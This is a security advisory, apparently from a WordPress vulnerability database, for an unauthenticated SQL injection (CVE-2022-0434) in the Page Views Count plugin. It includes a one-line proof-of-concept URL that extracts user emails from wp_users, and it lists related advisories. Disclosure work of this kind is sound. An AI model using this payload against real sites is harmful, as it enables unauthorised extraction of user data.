Page Views Count < 2.4.15 – Unauthenticated SQL Injection | CVE 2022-0434

Description

The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint, available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks

Proof of Concept

https://example.com/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20--%20g

Affects Plugins

page-views-count

Fixed in 2.4.15

References

CVE

CVE-2022-0434

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

be895016-7365-4ce4-a54f-f36d0ef2d6f1

Timeline

Publicly Published

2022-02-01 (about 3 years ago)

Added

2022-02-01 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-06-19

Title

Custom Field Suite <= 2.6.7 - Authenticated (Contributor+) SQL Injection via Term Custom Field

Published

2025-03-31

Title

Next-Cart Store to WooCommerce Migration < 3.9.5 - Unauthenticated SQL Injection

Published

2022-03-29

Title

Master Elements <= 8.0 - Unauthenticated SQLi

Published

2015-08-21

Title

Gallery Bank < 3.0.330 - Authenticated Blind SQL Injection

Published

2024-09-20

Title

LatePoint < 5.0.12 - Unauthenticated Arbitrary User Password Change via SQL Injection